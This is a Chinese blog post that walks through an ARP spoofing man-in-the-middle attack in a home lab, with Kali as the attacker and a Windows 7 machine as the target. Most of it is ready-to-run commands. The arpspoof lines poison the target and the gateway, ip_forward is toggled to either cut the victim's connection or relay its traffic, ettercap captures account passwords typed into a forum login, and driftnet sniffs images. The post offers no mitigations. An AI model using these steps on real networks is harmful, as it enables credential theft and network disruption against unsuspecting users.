【漏洞复现】局域网 ARP 中间人攻击获取他人账号密码

日期：2019-07-18 14:24:42
更新：
作者：Bay0net
介绍：如何在局域网内，窃取其他用户的账号密码？

0x01、漏洞环境

攻击工具 arpspoof 基本用法：

arpspoof -i eth0 -t 【目标 IP】 【网关】
arpspoof -i eth0 -t  【网关】【目标 IP】

攻击机

IP：192.168.43.67
操作系统：Kali 2019

靶机

IP：192.168.43.135
操作系统：Win7 旗舰版 SP1

攻击机和靶机，在同一个局域网内，局域网的网关是 192.168.43.1

在 kali 上，需要开启转发 IP 的功能，否则靶机会断网，所以可以使用该方法让靶机断网。

先欺骗靶机，开启两个命令行界面，分别输入下面两条命令

# 欺骗靶机
arpspoof -i eth0 -t 192.168.43.135 192.168.43.1
arpspoof -i eth0 -t 192.168.43.1 192.168.43.135

然后再开一个命令行，输入以下命令，关闭 ip_forward 功能。

# 0 代表关闭 ip_forward 功能
echo '0' > /proc/sys/net/ipv4/ip_forward

靶机已经无法连接互联网，一直在转圈。

如果想恢复主机的网络，再使用下面的语句即可。

echo '1' > /proc/sys/net/ipv4/ip_forward

演示的网站：http://www.discuz.net/forum.php

第一步，还是欺骗靶机，开启两个命令行界面，分别输入下面两条命令

# 欺骗靶机
arpspoof -i eth0 -t 192.168.43.135 192.168.43.1
arpspoof -i eth0 -t 192.168.43.1 192.168.43.135

第二步，开启转发

echo '1' > /proc/sys/net/ipv4/ip_forward

第三步，使用工具进行嗅探

ettercap -Tq -i eth0

此时在靶机输入账号密码进行登录，kali 会自动分析并且把密码显示出来。

点击登录，查看一下 kali，已经抓到了账号密码。

嗅探图片

driftnet -i eth0

posted @ 2019-07-18 14:54 Bay0net 阅读(1771) 评论(1) 编辑收藏举报

刷新页面返回顶部